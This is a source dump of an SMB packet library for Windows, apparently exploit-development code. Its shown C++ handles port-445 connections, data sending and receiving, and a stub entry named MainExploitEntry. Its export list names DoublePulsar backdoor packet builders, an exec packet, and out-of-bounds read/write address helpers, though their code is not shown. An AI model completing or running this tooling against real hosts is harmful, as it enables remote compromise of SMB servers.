├── .gitignore
├── LICENSE
├── README.md
├── SMBLibrary.sln
├── SMBLibrary.vcxproj
├── SMBLibrary.vcxproj.filters
├── SMBLibrary.vcxproj.user
├── Source.cpp
├── Source.def
├── liscence.txt
├── networkingfunctions.cpp
├── ntcreateandx.h
├── sessionsetupandx.h
├── smb.h
├── smbmacros.h
├── smbpacketstrings.h
├── smbtransaction.h
├── smbutils.cpp
├── treeconnectandx.h
└── windowssocket.h
/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Compiled Object files
5 | *.slo
6 | *.lo
7 | *.o
8 | *.obj
9 |
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 |
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 |
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 |
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 | *.lib
28 |
29 | # Executables
30 | *.exe
31 | *.out
32 | *.app
33 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CyberSecurityExploitDevelopment
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SMBLibrary
Windows CIFS/SMB packet generation and SMB networking library, built as a Win32/x64 DLL (Visual Studio 2019, v142 toolset). The headers cover the SMB1/CIFS command set (NEGOTIATE, SESSION_SETUP_ANDX, TREE_CONNECT_ANDX, NT_CREATE_ANDX, TRANS2); the exported API is listed in `Source.def`.

Note: two license texts are shipped — `LICENSE` (MIT) and `liscence.txt` (Creative Commons Attribution 4.0 International). Confirm which one applies before redistributing.
3 |
--------------------------------------------------------------------------------
/SMBLibrary.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29509.3
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SMBLibrary", "SMBLibrary.vcxproj", "{58E932A3-2AC1-4148-8039-09762C601182}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x64.ActiveCfg = Debug|x64
17 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x64.Build.0 = Debug|x64
18 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x86.ActiveCfg = Debug|Win32
19 | {58E932A3-2AC1-4148-8039-09762C601182}.Debug|x86.Build.0 = Debug|Win32
20 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x64.ActiveCfg = Release|x64
21 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x64.Build.0 = Release|x64
22 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x86.ActiveCfg = Release|Win32
23 | {58E932A3-2AC1-4148-8039-09762C601182}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {41A8F98A-53DF-4CCF-BB68-5C02524966A7}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {58E932A3-2AC1-4148-8039-09762C601182}
24 | SMBLibrary
25 | 10.0
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v142
32 | MultiByte
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v142
38 | true
39 | MultiByte
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v142
45 | MultiByte
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v142
51 | true
52 | MultiByte
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | Disabled
77 | true
78 | true
79 |
80 |
81 | Console
82 | Source.def
83 |
84 |
85 |
86 |
87 | Level3
88 | Disabled
89 | true
90 | true
91 |
92 |
93 | Console
94 | Source.def
95 |
96 |
97 |
98 |
99 | Level3
100 | MaxSpeed
101 | true
102 | true
103 | true
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | Source.def
111 |
112 |
113 |
114 |
115 | Level3
116 | MaxSpeed
117 | true
118 | true
119 | true
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | Source.def
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 | Source Files
44 |
45 |
46 |
47 |
48 | Source Files
49 |
50 |
51 | Source Files
52 |
53 |
54 |
55 |
56 | Source Files
57 |
58 |
59 |
--------------------------------------------------------------------------------
/SMBLibrary.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\Windows\System32\rundll32.exe
5 | $(TargetPath),#1
6 | WindowsLocalDebugger
7 |
8 |
9 | C:\Windows\System32\rundll32.exe
10 | $(TargetPath),#1
11 | WindowsLocalDebugger
12 |
13 |
14 | C:\Windows\System32\rundll32.exe
15 | $(TargetPath),#1
16 | WindowsLocalDebugger
17 |
18 |
19 | C:\Windows\System32\rundll32.exe
20 | $(TargetPath),#1
21 | WindowsLocalDebugger
22 |
23 |
--------------------------------------------------------------------------------
/Source.cpp:
--------------------------------------------------------------------------------
1 | #include "smb.h"
2 |
#pragma comment(lib, "ws2_32")   // Winsock 2: socket/connect/send/recv/closesocket used below
#pragma comment(lib, "crypt32")  // CryptoAPI; nothing in this file references it — presumably for the csprng export in another unit, confirm
#define NO_INLINING

#ifdef NO_INLINING
#pragma auto_inline(off)         // keep every function out-of-line (reason not recorded; likely for debugging/exports)
#endif // NO_INLINING

#ifdef _DEBUG
DWORD __stdcall dbgtests(PVOID pvip);   // debug-only worker thread started by MainExploitEntry
#endif // _DEBUG

// NOTE(review): these disables are file-wide. 4267/4244 silence size_t->int and other
// narrowing conversions, 6387 silences "argument may be NULL" analysis hits — exactly
// the classes of bug that matter in packet/buffer code. Prefer fixing the sites and
// scoping any remaining disable with warning(push)/warning(pop) as
// networkingfunctions.cpp does.
#pragma warning(disable : 4267)
#pragma warning(disable : 4244)
#pragma warning(disable : 6387)
18 |
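INT_PTR __stdcall MainExploitEntry(void)
{
    // Exported entry point (ordinal #1 in Source.def; SMBLibrary.vcxproj.user launches
    // it through rundll32 as "$(TargetPath),#1").
    //
    // Picks a target IPv4 address string (default 127.0.0.1), converts it to a narrow
    // STRING, starts a worker thread with that string as its argument, waits for the
    // worker and returns its exit code as the status. In non-_DEBUG builds no worker
    // is created (the CreateThread call is commented out), so the function returns
    // STATUS_INVALID_HANDLE without doing anything else.
    //
    // Returns: the worker thread's exit code, or STATUS_INVALID_HANDLE when no thread
    //          could be started or its exit code could not be read.
    //
    // NOTE(review): rundll32 calls its entry as void CALLBACK Fn(HWND, HINSTANCE, LPSTR, int).
    // This __stdcall (void) signature does not match; on 32-bit builds the callee-cleans
    // convention leaves the caller's four arguments on the stack — confirm rundll32
    // tolerates that before relying on the .vcxproj.user debug command on x86.
    static STRING s;
    static UNICODE_STRING ipaddressarg, args;
    static HANDLE hthread;
    static DWORD dwtid, dwexitcode, argc;
    static INT_PTR status;
    ANYPOINTER p = { 0 };
    BUFFER tmp = { 0 };
    wchar_t* argv[2] = { NULL };
    size_t cbarg = 0;   // byte size of argv[1] including its terminator

    // The statics keep their values between calls; make the one this function
    // branches on explicit so a stale handle from a previous call is never reused.
    hthread = NULL;

    InitUnicodeString(L"127.0.0.1", &args);

    // NOTE(review): GetCommandLineW() returns the whole command line (not argv[0]), and
    // argv[1] is the built-in default, so a user-supplied address is never consulted
    // here. argc is a zero-initialised static that nothing in this function assigns;
    // whether GetUnsigned() obtains it from elsewhere is not visible in this file —
    // confirm before relying on the "argc >= 2" branch.
    *argv = GetCommandLineW();
    argv[1] = args.Buffer;

    if (GetUnsigned(&argc) >= 2 && notnull(argv[1]))
    {
        // argv[1] is a wide string: size the scratch buffer in BYTES, terminator
        // included, and copy the whole string. The previous wcslen()-sized copy
        // moved only half of the characters.
        cbarg = (wcslen(argv[1]) + 1) * sizeof(wchar_t);
        bwsalloc(&tmp, cbarg);
        if (notnull(tmp.pbdata))
        {
            RtlCopyMemory(tmp.pbdata, argv[1], cbarg);
            // Weak sanity check only: a string containing a '.' is taken as an
            // address, anything else falls back to loopback. No parsing happens here.
            if (!find_memory_pattern(&tmp, &p, L".", sizeof(wchar_t)))
                InitUnicodeString(L"127.0.0.1", &ipaddressarg);
            else
                InitUnicodeString(argv[1], &ipaddressarg);
            bwsfree(&tmp);
        }
        else
        {
            InitUnicodeString(L"127.0.0.1", &ipaddressarg);
        }
        p = { 0 };
    }
    else
    {
        InitUnicodeString(L"127.0.0.1", &ipaddressarg);
    }

    FreeUnicodeString(&args);
    ConvertUnicodeToString(&ipaddressarg, &s);
    FreeUnicodeString(&ipaddressarg);

#ifdef _DEBUG
    // Debug builds run the self-test stub; s.Buffer stays valid until the thread has
    // been joined below.
    hthread = CreateThread(NULL, 0, &dbgtests, s.Buffer, 0, &dwtid);
#else
    // TODO: no worker is wired up for release builds yet.
    // hthread = CreateThread(NULL, 0, , s.Buffer, 0, &dwtid);
#endif // _DEBUG

    if (isnull(hthread))
    {
        FreeString(&s);
        PutUlongPtr(&status, STATUS_INVALID_HANDLE);
        return status;
    }

    WaitForSingleObject(hthread, INFINITE);
    // GetExitCodeThread() can fail; report that instead of returning whatever the
    // static dwexitcode still held from an earlier call.
    if (!GetExitCodeThread(hthread, &dwexitcode))
        dwexitcode = STATUS_INVALID_HANDLE;
    CloseHandle(hthread);
    FreeString(&s);

    PutUlongPtr(&status, (ULONG_PTR)GetUlong(&dwexitcode));
    return status;
}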
76 |
77 |
78 | #ifdef _DEBUG
DWORD __stdcall dbgtests(PVOID pvip)
{
    // Debug-only worker stub. The narrow target-address string handed over by
    // MainExploitEntry is currently ignored and the thread simply exits with 0.
    (void)pvip;
    return 0;
}
83 | #endif // _DEBUG
84 |
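unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status)
{
    // Opens a blocking IPv4 TCP connection to targetip on port 445 (SMB over TCP).
    //
    // Out-parameters (all reset on entry):
    //   s      - the connected socket on success, 0 on any failure
    //   sa     - the endpoint that was connected to
    //   wsa    - WSAStartup() details
    //   status - raw WSAStartup() / connect() result
    //
    // Returns 0 on success; otherwise the WSAStartup()/socket() error code,
    // STATUS_INVALID_HANDLE (ws2_32 or inet_addr unavailable, targetip NULL or not a
    // parsable dotted-quad) or STATUS_FAIL (connect() failed). Every failure path
    // releases what it acquired (socket, WSAStartup reference), so the caller only
    // needs CloseAndClearSocket() after a successful return. Unlike the earlier
    // version this never calls ExitProcess(): library code must not kill its host.
    typedef unsigned long(__stdcall* PFN_INET_ADDR)(const char* ip);
    HMODULE wsockdll = NULL;
    PFN_INET_ADDR pinet_addr = NULL;
    unsigned long addr = 0;
    unsigned int err = 0;

    s = 0;
    sa = { 0 };
    wsa = { 0 };
    status = 0;

    if (isnull(targetip))
        return STATUS_INVALID_HANDLE;

    // WSAStartup() returns its error code directly; WSAGetLastError() is not
    // meaningful for it (per the Winsock documentation).
    status = WSAStartup(MAKEWORD(2, 2), &wsa);
    if (status != 0)
        return MAKEUNSIGNED(status);

    // ws2_32 is already linked (socket/connect are called directly below); the module
    // handle exists only to look up inet_addr without a static reference to it.
    // Explicit L"" literals: the *W APIs take wide strings whatever UNICODE is set to.
    wsockdll = GetModuleHandleW(L"ws2_32");
    if (isnull(wsockdll))
        wsockdll = LoadLibraryW(L"ws2_32.dll");
    if (isnull(wsockdll))
    {
        WSACleanup();
        return STATUS_INVALID_HANDLE;
    }

    pinet_addr = (PFN_INET_ADDR)GetProcAddress(wsockdll, "inet_addr");
    if (isnull(pinet_addr))
    {
        WSACleanup();
        return STATUS_INVALID_HANDLE;
    }

    // inet_addr() yields INADDR_NONE (0xFFFFFFFF) for anything it cannot parse. Without
    // this check a malformed target string silently became a connect() to
    // 255.255.255.255. (The broadcast address itself is therefore rejected too; it is
    // not a usable SMB target anyway.)
    addr = pinet_addr(targetip);
    if (addr == INADDR_NONE)
    {
        WSACleanup();
        return STATUS_INVALID_HANDLE;
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = addr;
    sa.sin_port = htons(445);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (!validsock(s))
    {
        err = MAKEUNSIGNED(WSAGetLastError());
        s = 0;
        WSACleanup();
        return err;
    }

    status = connect(s, (sockaddr*)&sa, sizeof(sa));
    if (issockerr(status))
    {
#ifdef _DEBUG
        fwprintf_s(stderr, L"[%ws]:\t error 0x%08x occured when calling \"%ws\"\n", __FUNCTIONW__, STATUS_FAIL, L"connect()");
#endif //_DEBUG
        // Release the socket and the WSA reference instead of leaking them (release
        // build) or terminating the process (debug build).
        closesocket(s);
        s = 0;
        WSACleanup();
        return MAKEUNSIGNED(STATUS_FAIL);
    }

    status = 0;
    return 0;
}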
151 |
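unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status)
{
    // Writes bws->pbdata (bws->dwsize bytes) to the connected socket s.
    //
    // send() may accept fewer bytes than requested even on a blocking stream socket,
    // so this loops until everything is out; a single unchecked send() could leave an
    // SMB request truncated on the wire with no error reported.
    //
    // Returns / status: the number of bytes sent (== bws->dwsize on success), or the
    // unsigned form of SOCKET_ERROR (query WSAGetLastError() for the cause). A bad
    // socket returns the WSA error code without touching the buffer, as before.
    // bws itself is not modified.
    const DWORD kMaxChunk = 0x7FFFFFFFu;   // largest length a single send() accepts
    const char* cursor = NULL;
    DWORD remaining = 0;
    DWORD total = 0;
    int chunk = 0;
    int sent = 0;

    status = 0;

    if (badsock(s))
        return MAKEUNSIGNED(WSAGetLastError());

    if (isnull(bws) || isnull(bws->pbdata))
    {
        status = MAKEUNSIGNED(SOCKET_ERROR);
        return status;
    }

    cursor = (const char*)bws->pbdata;
    remaining = bws->dwsize;

    while (remaining > 0)
    {
        chunk = (int)(remaining > kMaxChunk ? kMaxChunk : remaining);
        sent = send(s, cursor, chunk, 0);
        if (issockerr(sent))
        {
            status = MAKEUNSIGNED(sent);
            return status;
        }
        if (sent == 0)
            break;   // nothing accepted; report what went out rather than spin
        cursor += sent;
        remaining -= (DWORD)sent;
        total += (DWORD)sent;
    }

    status = total;
    return status;
}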
162 |
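unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status)
{
    // Allocates a bufsize-byte receive buffer in *bws and performs ONE recv() into it.
    //
    // Single-shot semantics are kept on purpose: the result is whatever one recv()
    // delivers, which may be less than a full SMB message (and 0 on orderly
    // shutdown). Callers that need a complete message must loop; bws->dwsize stays
    // the allocated size, not the received byte count.
    //
    // Returns / status: bytes received, 0 on shutdown, unsigned SOCKET_ERROR on
    // failure or bad arguments; a bad socket returns the WSA error code. The socket
    // is validated BEFORE allocating so an early return no longer leaks *bws.
    const DWORD kMaxChunk = 0x7FFFFFFFu;   // largest length a single recv() accepts

    status = 0;

    if (badsock(s))
        return MAKEUNSIGNED(WSAGetLastError());

    // A zero-length recv() would return 0 and be indistinguishable from shutdown.
    if (isnull(bws) || bufsize == 0 || bufsize > kMaxChunk)
    {
        status = MAKEUNSIGNED(SOCKET_ERROR);
        return status;
    }

    bwsalloc(bws, bufsize);
    if (isnull(bws->pbdata))
    {
        status = MAKEUNSIGNED(SOCKET_ERROR);
        return status;
    }

    *(int*)(&status) = recv(s, (char*)bws->pbdata, (int)bws->dwsize, 0);
    return status;
}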
173 |
unsigned int CloseAndClearSocket(SOCKET IN OUT& sfd, BOOLEAN IN WSAClean)
{
    // Closes sfd if it is a usable socket, zeroes the caller's handle either way and,
    // when WSAClean is set, drops the WSAStartup() reference taken by TargetConnect().
    //
    // Returns the closesocket() result (0, or unsigned SOCKET_ERROR — see
    // WSAGetLastError() for the cause); 0 when there was nothing to close.
    unsigned int result = 0;

    if (validsock(sfd))
    {
        int rc = closesocket(sfd);
        result = *(unsigned int*)(&rc);
    }
    sfd = 0;

    if (WSAClean)
        (void)WSACleanup();

    return result;
}
--------------------------------------------------------------------------------
/Source.def:
--------------------------------------------------------------------------------
1 | LIBRARY SMBLibrary.dll
2 |
3 |
4 | EXPORTS
5 | MainExploitEntry @1
6 |
7 | bwsalloc
8 | bwsfree
9 | bwscat
10 | bwsnew
11 | bwsdelete
12 | bwsallocateandcopy
13 |
14 | __memcmp
15 | find_memory_pattern
16 | update_smb_info
17 | csprng
18 | random
19 |
20 | FindLeakedTrans2DispatchTable
21 | GetDoublePulsarStatusCode
22 | GetDoublePulsarOpCode
23 | GenerateDoublePulsarOpcodePacket
24 | GetDoublePulsarXorKey
25 | GetOOBWriteAddress
26 | GenerateDoublePulsarTrans2SessionSetupParameters
27 | PadDoPuPayloadToProperSize
28 | GetAllOOBReadAddressesFromMultiRequest
29 | FindLeakedDataFragTag
30 | FindLeadedDataLStrTag
31 |
32 | InitString
33 | FreeString
34 | InitUnicodeString
35 | FreeUnicodeString
36 | ConvertStringToUnicode
37 | ConvertUnicodeToString
38 | DumpHex
39 |
40 | TargetConnect
41 | SendData
42 | RecvData
43 | CloseAndClearSocket
44 |
45 | negotiate_request_packet
46 | session_setup_packet
47 | tree_connect_packet
48 |
49 | trans2_session_setup_packet
50 | trans2_session_setup_dopu_kill
51 | trans2_session_setup_dopu_ping
52 | trans2_session_setup_dopu_exec
53 | tree_disconnect_packet
54 | logoff_andx_packet
55 |
56 | readfile
57 |
58 |
59 |
--------------------------------------------------------------------------------
/liscence.txt:
--------------------------------------------------------------------------------
1 | Attribution 4.0 International
2 |
3 | =======================================================================
4 |
5 | Creative Commons Corporation ("Creative Commons") is not a law firm and
6 | does not provide legal services or legal advice. Distribution of
7 | Creative Commons public licenses does not create a lawyer-client or
8 | other relationship. Creative Commons makes its licenses and related
9 | information available on an "as-is" basis. Creative Commons gives no
10 | warranties regarding its licenses, any material licensed under their
11 | terms and conditions, or any related information. Creative Commons
12 | disclaims all liability for damages resulting from their use to the
13 | fullest extent possible.
14 |
15 | Using Creative Commons Public Licenses
16 |
17 | Creative Commons public licenses provide a standard set of terms and
18 | conditions that creators and other rights holders may use to share
19 | original works of authorship and other material subject to copyright
20 | and certain other rights specified in the public license below. The
21 | following considerations are for informational purposes only, are not
22 | exhaustive, and do not form part of our licenses.
23 |
24 | Considerations for licensors: Our public licenses are
25 | intended for use by those authorized to give the public
26 | permission to use material in ways otherwise restricted by
27 | copyright and certain other rights. Our licenses are
28 | irrevocable. Licensors should read and understand the terms
29 | and conditions of the license they choose before applying it.
30 | Licensors should also secure all rights necessary before
31 | applying our licenses so that the public can reuse the
32 | material as expected. Licensors should clearly mark any
33 | material not subject to the license. This includes other CC-
34 | licensed material, or material used under an exception or
35 | limitation to copyright. More considerations for licensors:
36 | wiki.creativecommons.org/Considerations_for_licensors
37 |
38 | Considerations for the public: By using one of our public
39 | licenses, a licensor grants the public permission to use the
40 | licensed material under specified terms and conditions. If
41 | the licensor's permission is not necessary for any reason--for
42 | example, because of any applicable exception or limitation to
43 | copyright--then that use is not regulated by the license. Our
44 | licenses grant only permissions under copyright and certain
45 | other rights that a licensor has authority to grant. Use of
46 | the licensed material may still be restricted for other
47 | reasons, including because others have copyright or other
48 | rights in the material. A licensor may make special requests,
49 | such as asking that all changes be marked or described.
50 | Although not required by our licenses, you are encouraged to
51 | respect those requests where reasonable. More considerations
52 | for the public:
53 | wiki.creativecommons.org/Considerations_for_licensees
54 |
55 | =======================================================================
56 |
57 | Creative Commons Attribution 4.0 International Public License
58 |
59 | By exercising the Licensed Rights (defined below), You accept and agree
60 | to be bound by the terms and conditions of this Creative Commons
61 | Attribution 4.0 International Public License ("Public License"). To the
62 | extent this Public License may be interpreted as a contract, You are
63 | granted the Licensed Rights in consideration of Your acceptance of
64 | these terms and conditions, and the Licensor grants You such rights in
65 | consideration of benefits the Licensor receives from making the
66 | Licensed Material available under these terms and conditions.
67 |
68 |
69 | Section 1 -- Definitions.
70 |
71 | a. Adapted Material means material subject to Copyright and Similar
72 | Rights that is derived from or based upon the Licensed Material
73 | and in which the Licensed Material is translated, altered,
74 | arranged, transformed, or otherwise modified in a manner requiring
75 | permission under the Copyright and Similar Rights held by the
76 | Licensor. For purposes of this Public License, where the Licensed
77 | Material is a musical work, performance, or sound recording,
78 | Adapted Material is always produced where the Licensed Material is
79 | synched in timed relation with a moving image.
80 |
81 | b. Adapter's License means the license You apply to Your Copyright
82 | and Similar Rights in Your contributions to Adapted Material in
83 | accordance with the terms and conditions of this Public License.
84 |
85 | c. Copyright and Similar Rights means copyright and/or similar rights
86 | closely related to copyright including, without limitation,
87 | performance, broadcast, sound recording, and Sui Generis Database
88 | Rights, without regard to how the rights are labeled or
89 | categorized. For purposes of this Public License, the rights
90 | specified in Section 2(b)(1)-(2) are not Copyright and Similar
91 | Rights.
92 |
93 | d. Effective Technological Measures means those measures that, in the
94 | absence of proper authority, may not be circumvented under laws
95 | fulfilling obligations under Article 11 of the WIPO Copyright
96 | Treaty adopted on December 20, 1996, and/or similar international
97 | agreements.
98 |
99 | e. Exceptions and Limitations means fair use, fair dealing, and/or
100 | any other exception or limitation to Copyright and Similar Rights
101 | that applies to Your use of the Licensed Material.
102 |
103 | f. Licensed Material means the artistic or literary work, database,
104 | or other material to which the Licensor applied this Public
105 | License.
106 |
107 | g. Licensed Rights means the rights granted to You subject to the
108 | terms and conditions of this Public License, which are limited to
109 | all Copyright and Similar Rights that apply to Your use of the
110 | Licensed Material and that the Licensor has authority to license.
111 |
112 | h. Licensor means the individual(s) or entity(ies) granting rights
113 | under this Public License.
114 |
115 | i. Share means to provide material to the public by any means or
116 | process that requires permission under the Licensed Rights, such
117 | as reproduction, public display, public performance, distribution,
118 | dissemination, communication, or importation, and to make material
119 | available to the public including in ways that members of the
120 | public may access the material from a place and at a time
121 | individually chosen by them.
122 |
123 | j. Sui Generis Database Rights means rights other than copyright
124 | resulting from Directive 96/9/EC of the European Parliament and of
125 | the Council of 11 March 1996 on the legal protection of databases,
126 | as amended and/or succeeded, as well as other essentially
127 | equivalent rights anywhere in the world.
128 |
129 | k. You means the individual or entity exercising the Licensed Rights
130 | under this Public License. Your has a corresponding meaning.
131 |
132 |
133 | Section 2 -- Scope.
134 |
135 | a. License grant.
136 |
137 | 1. Subject to the terms and conditions of this Public License,
138 | the Licensor hereby grants You a worldwide, royalty-free,
139 | non-sublicensable, non-exclusive, irrevocable license to
140 | exercise the Licensed Rights in the Licensed Material to:
141 |
142 | a. reproduce and Share the Licensed Material, in whole or
143 | in part; and
144 |
145 | b. produce, reproduce, and Share Adapted Material.
146 |
147 | 2. Exceptions and Limitations. For the avoidance of doubt, where
148 | Exceptions and Limitations apply to Your use, this Public
149 | License does not apply, and You do not need to comply with
150 | its terms and conditions.
151 |
152 | 3. Term. The term of this Public License is specified in Section
153 | 6(a).
154 |
155 | 4. Media and formats; technical modifications allowed. The
156 | Licensor authorizes You to exercise the Licensed Rights in
157 | all media and formats whether now known or hereafter created,
158 | and to make technical modifications necessary to do so. The
159 | Licensor waives and/or agrees not to assert any right or
160 | authority to forbid You from making technical modifications
161 | necessary to exercise the Licensed Rights, including
162 | technical modifications necessary to circumvent Effective
163 | Technological Measures. For purposes of this Public License,
164 | simply making modifications authorized by this Section 2(a)
165 | (4) never produces Adapted Material.
166 |
167 | 5. Downstream recipients.
168 |
169 | a. Offer from the Licensor -- Licensed Material. Every
170 | recipient of the Licensed Material automatically
171 | receives an offer from the Licensor to exercise the
172 | Licensed Rights under the terms and conditions of this
173 | Public License.
174 |
175 | b. No downstream restrictions. You may not offer or impose
176 | any additional or different terms or conditions on, or
177 | apply any Effective Technological Measures to, the
178 | Licensed Material if doing so restricts exercise of the
179 | Licensed Rights by any recipient of the Licensed
180 | Material.
181 |
182 | 6. No endorsement. Nothing in this Public License constitutes or
183 | may be construed as permission to assert or imply that You
184 | are, or that Your use of the Licensed Material is, connected
185 | with, or sponsored, endorsed, or granted official status by,
186 | the Licensor or others designated to receive attribution as
187 | provided in Section 3(a)(1)(A)(i).
188 |
189 | b. Other rights.
190 |
191 | 1. Moral rights, such as the right of integrity, are not
192 | licensed under this Public License, nor are publicity,
193 | privacy, and/or other similar personality rights; however, to
194 | the extent possible, the Licensor waives and/or agrees not to
195 | assert any such rights held by the Licensor to the limited
196 | extent necessary to allow You to exercise the Licensed
197 | Rights, but not otherwise.
198 |
199 | 2. Patent and trademark rights are not licensed under this
200 | Public License.
201 |
202 | 3. To the extent possible, the Licensor waives any right to
203 | collect royalties from You for the exercise of the Licensed
204 | Rights, whether directly or through a collecting society
205 | under any voluntary or waivable statutory or compulsory
206 | licensing scheme. In all other cases the Licensor expressly
207 | reserves any right to collect such royalties.
208 |
209 |
210 | Section 3 -- License Conditions.
211 |
212 | Your exercise of the Licensed Rights is expressly made subject to the
213 | following conditions.
214 |
215 | a. Attribution.
216 |
217 | 1. If You Share the Licensed Material (including in modified
218 | form), You must:
219 |
220 | a. retain the following if it is supplied by the Licensor
221 | with the Licensed Material:
222 |
223 | i. identification of the creator(s) of the Licensed
224 | Material and any others designated to receive
225 | attribution, in any reasonable manner requested by
226 | the Licensor (including by pseudonym if
227 | designated);
228 |
229 | ii. a copyright notice;
230 |
231 | iii. a notice that refers to this Public License;
232 |
233 | iv. a notice that refers to the disclaimer of
234 | warranties;
235 |
236 | v. a URI or hyperlink to the Licensed Material to the
237 | extent reasonably practicable;
238 |
239 | b. indicate if You modified the Licensed Material and
240 | retain an indication of any previous modifications; and
241 |
242 | c. indicate the Licensed Material is licensed under this
243 | Public License, and include the text of, or the URI or
244 | hyperlink to, this Public License.
245 |
246 | 2. You may satisfy the conditions in Section 3(a)(1) in any
247 | reasonable manner based on the medium, means, and context in
248 | which You Share the Licensed Material. For example, it may be
249 | reasonable to satisfy the conditions by providing a URI or
250 | hyperlink to a resource that includes the required
251 | information.
252 |
253 | 3. If requested by the Licensor, You must remove any of the
254 | information required by Section 3(a)(1)(A) to the extent
255 | reasonably practicable.
256 |
257 | 4. If You Share Adapted Material You produce, the Adapter's
258 | License You apply must not prevent recipients of the Adapted
259 | Material from complying with this Public License.
260 |
261 |
262 | Section 4 -- Sui Generis Database Rights.
263 |
264 | Where the Licensed Rights include Sui Generis Database Rights that
265 | apply to Your use of the Licensed Material:
266 |
267 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right
268 | to extract, reuse, reproduce, and Share all or a substantial
269 | portion of the contents of the database;
270 |
271 | b. if You include all or a substantial portion of the database
272 | contents in a database in which You have Sui Generis Database
273 | Rights, then the database in which You have Sui Generis Database
274 | Rights (but not its individual contents) is Adapted Material; and
275 |
276 | c. You must comply with the conditions in Section 3(a) if You Share
277 | all or a substantial portion of the contents of the database.
278 |
279 | For the avoidance of doubt, this Section 4 supplements and does not
280 | replace Your obligations under this Public License where the Licensed
281 | Rights include other Copyright and Similar Rights.
282 |
283 |
